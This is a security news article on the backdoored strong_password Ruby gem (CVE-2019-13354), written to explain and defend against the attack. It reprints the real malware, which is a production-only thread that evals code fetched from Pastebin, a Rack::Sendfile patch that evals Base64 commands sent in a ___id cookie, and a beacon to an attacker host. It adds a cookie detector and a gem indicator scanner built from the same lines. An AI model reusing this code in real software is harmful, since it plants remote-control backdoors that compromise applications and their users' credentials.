Backdoor discovered in a Ruby library that checks for strong passwords

A backdoor was discovered in "strong_password", a popular Ruby gem whose job is to check the strength of a password chosen by a user.

The injected code first checked which environment the library was running in: the hook only fires when Rails.env starts with "p", i.e. in production, so test suites and development machines never see anything unusual. In production it started a background thread that periodically downloaded further Ruby code from the text-hosting service Pastebin.com and executed it with eval.

That downloaded code installed a remote-control backdoor in every application that loaded the library, so the applications and their users were compromised rather than the library itself.

# Swallow every exception, so the backdoor never crashes the app or shows up in logs.
def _!;begin;yield;rescue Exception;end;end
# Only when Rails.env starts with "p" (production): spawn a background thread that,
# every 0-3333 seconds, fetches Ruby source from Pastebin and executes it with eval.
# Net::HTTP, URI and Rails are already loaded in the Rails process this runs in.
_!{Thread.new{loop{_!{sleep rand*3333;eval(Net::HTTP.get(URI('https://pastebin.com/raw/xa456PFt')))}}}if Rails.env[0]=="p"}

The code fetched from Pastebin did two things. It reported the application's host name (taken from the URL_HOST environment variable) to "smiley.zzz.com.ua", and it patched the Rack::Sendfile middleware so that every incoming HTTP request was inspected for a cookie named ___id. The value of that cookie was decoded as URL-safe Base64 and executed with eval, which gave the attacker a command channel hidden inside ordinary web requests.

_! {
  unless defined?(Z1)
    # Prepend a module to the Rack::Sendfile middleware so every request passes
    # through it: the value of the ___id cookie is URL-safe-Base64-decoded and
    # eval()ed as Ruby, then the request continues to the real middleware.
    Rack::Sendfile.prepend Module.new{define_method(:call){|e|
      _!{eval(Base64.urlsafe_decode64(e['HTTP_COOKIE'].match(/___id=(.+);/)[1]))}
      super(e)}}
    Z1 = "(:"   # marker constant, so the patch is installed only once
  end
}

_! {
  # Beacon: report the application's host name to the operator's server.
  Faraday.get("http://smiley.zzz.com.ua", { "x" => ENV["URL_HOST"].to_s })
}
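The following is an added example, not code from the gem or from the original audit. It models the ___id cookie channel shown above so a defender can decode and detect it (nothing is ever eval'ed), and it shows the runtime check that catches the Rack::Sendfile patch. CookieC2Probe, FakeSendfile, the helper names and the sample cookie header are assumptions for the demo; FakeSendfile stands in for Rack::Sendfile so the code runs without the rack gem installed.

```ruby
# Added example: decoder/detector for the ___id cookie channel and an
# ancestry check for prepended modules. Not part of strong_password.
require 'base64'

module CookieC2Probe
  COOKIE_NAME = '___id'

  # Parse a raw Cookie header the way Rack presents it in env['HTTP_COOKIE'].
  def self.parse_cookies(header)
    header.to_s.split(/;\s*/).each_with_object({}) do |pair, h|
      name, value = pair.split('=', 2)
      h[name] = value if name && value
    end
  end

  # Broad detector: a request carrying a ___id cookie at all, in any position.
  def self.cookie_present?(header)
    parse_cookies(header).key?(COOKIE_NAME)
  end

  # What the backdoor would have eval'ed, or nil. This mirrors the malware's
  # own regexp /___id=(.+);/: it is greedy and needs a trailing ';', so the
  # operator had to send ___id as the only cookie, terminated by ';'. A
  # detector should not depend on that exact shape (see cookie_present?).
  def self.extract_payload(header)
    m = header.to_s.match(/___id=(.+);/)
    return nil unless m
    Base64.urlsafe_decode64(m[1])
  rescue ArgumentError # capture group was not valid URL-safe Base64
    nil
  end

  # Integrity check: modules prepended to a class precede it in its ancestors.
  # A clean Rack::Sendfile returns []; the backdoor's anonymous Module shows up
  # here. In a real app call prepended_modules(Rack::Sendfile).
  def self.prepended_modules(klass)
    klass.ancestors.take_while { |m| m != klass }
  end

  # Hypothetical stand-in for Rack::Sendfile (the real one forwards the request).
  class FakeSendfile
    def call(_env)
      [200, {}, ['ok']]
    end
  end

  # Mirror of the backdoor's patch, with eval replaced by recording the payload.
  def self.install_mock_backdoor!(klass, seen)
    klass.prepend(Module.new {
      define_method(:call) do |e|
        payload = CookieC2Probe.extract_payload(e['HTTP_COOKIE'])
        seen << payload if payload
        super(e)
      end
    })
  end

  # End-to-end demo on a fresh subclass: clean class, patched class, and one
  # request carrying a constructed command cookie.
  def self.run_demo
    klass = Class.new(FakeSendfile)
    before = prepended_modules(klass).size
    seen = []
    install_mock_backdoor!(klass, seen)
    header = "#{COOKIE_NAME}=#{Base64.urlsafe_encode64("puts 'hello from c2'")};"
    status, = klass.new.call('HTTP_COOKIE' => header)
    { prepends_before: before, prepends_after: prepended_modules(klass).size,
      status: status, seen: seen, flagged: cookie_present?(header) }
  end
end
```

The ancestry check is the useful part in production: an anonymous Module sitting in front of Rack::Sendfile (or any other middleware class) in its ancestors is something a deploy-time smoke test can assert against, independent of the cookie name the next campaign happens to choose.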

The backdoored code never appeared in the library's GitHub repository. Instead, the attacker took over ownership of the gem on RubyGems.org, replacing the original maintainer, and published a new release from there: version 0.0.7 of strong_password, which contained the backdoor and was downloaded 537 times according to RubyGems statistics.

The backdoor was uncovered by Tute Costa, a developer who reviewed the changes in each dependency before updating the gems used in his production application. He immediately notified the Ruby security team and the library's author, and the issue was assigned CVE-2019-13354.

The library is typically used in websites and applications with user accounts, in the sign-up and password-change flows, so the malicious code ran in exactly the component that handles credentials. This shows that any library used in such a critical part of an application should go through a proper security review before it is deployed, to keep users' data safe.
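As an added example of the kind of review the previous paragraphs call for (this is not code from the gem or from the original audit), the scanner below turns the two snippets on this page into source-level indicators and checks arbitrary source text, or every gem installed on the machine, for them. The module name, method names and indicator thresholds are assumptions; the three sample sources are constructed for the demo, the first two being the snippets from this page.

```ruby
# Added example: indicator scanner for the strong_password backdoor pattern.
# Not part of strong_password; names and thresholds are the author's choice.
require 'rubygems'

module GemIndicatorScan
  INDICATORS = {
    pastebin_raw:      %r{https?://pastebin\.com/raw/}i,                           # remote stage-2 host
    eval_of_http_body: /eval\s*\(\s*Net::HTTP\.get/,                               # executes fetched text
    prod_env_gate:     /Rails\.env\s*\[\s*0\s*\]\s*==\s*["']p["']/,                 # runs only in production
    swallow_all:       /rescue\s+Exception\s*;?\s*end/,                            # hides every failure
    bg_loop_thread:    /Thread\.new\s*\{\s*loop\s*\{/,                             # persistent background loop
    cookie_eval:       /eval\s*\(\s*Base64\.urlsafe_decode64\(.{0,60}HTTP_COOKIE/, # cookie command channel
    middleware_patch:  /Rack::\w+\.prepend\s+Module\.new/,                         # hooks every request
  }.freeze

  # Indicators that are damning on their own.
  DECISIVE = %i[eval_of_http_body cookie_eval middleware_patch].freeze

  # Names of the indicators found in a piece of source text.
  def self.scan_source(src)
    INDICATORS.select { |_, re| src.match?(re) }.keys
  end

  # One decisive hit, or two weaker ones together, flags a file.
  def self.suspicious?(src)
    hits = scan_source(src)
    (hits & DECISIVE).any? || hits.size >= 2
  end

  # Walk every installed gem; return { "name-version" => { path => hits } }
  # for files that look suspicious. Unreadable files are skipped.
  def self.scan_installed_gems
    results = {}
    Gem::Specification.each do |spec|
      Dir.glob(File.join(spec.full_gem_path, '**', '*.rb')).each do |path|
        src = begin
          File.binread(path)
        rescue SystemCallError
          next
        end
        next unless suspicious?(src)
        (results[spec.full_name] ||= {})[path] = scan_source(src)
      end
    end
    results
  end

  # Constructed samples for the demo; the first two are the snippets on this page.
  SAMPLE_STAGE1 = <<~'RUBY'
    def _!;begin;yield;rescue Exception;end;end
    _!{Thread.new{loop{_!{sleep rand*3333;eval(Net::HTTP.get(URI('https://pastebin.com/raw/xa456PFt')))}}}if Rails.env[0]=="p"}
  RUBY

  SAMPLE_STAGE2 = <<~'RUBY'
    _! {
      unless defined?(Z1)
        Rack::Sendfile.prepend Module.new{define_method(:call){|e|
        _!{eval(Base64.urlsafe_decode64(e['HTTP_COOKIE'].match(/___id=(.+);/)[1]))}
        super(e)}}
        Z1 = "(:"
      end
    }
  RUBY

  SAMPLE_BENIGN = <<~'RUBY'
    class StrengthChecker
      def strong?(password)
        password.length >= 12 && password.match?(/\d/) && password.match?(/[^A-Za-z0-9]/)
      end
    end
  RUBY
end
```

Run GemIndicatorScan.scan_installed_gems from a console on a build machine, or from a CI step after bundle install, and treat any non-empty result as a blocker. The regexps are deliberately specific to this campaign; the point is the workflow, reading what a dependency update actually ships rather than trusting its version number, which is what caught this backdoor in the first place.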

Backdoors serve different purposes: the backdoors alleged in Huawei equipment, for example, were suspected of enabling espionage by the Chinese government. Whatever the purpose, the outcome is the same: the affected system remains in a permanently compromised state.
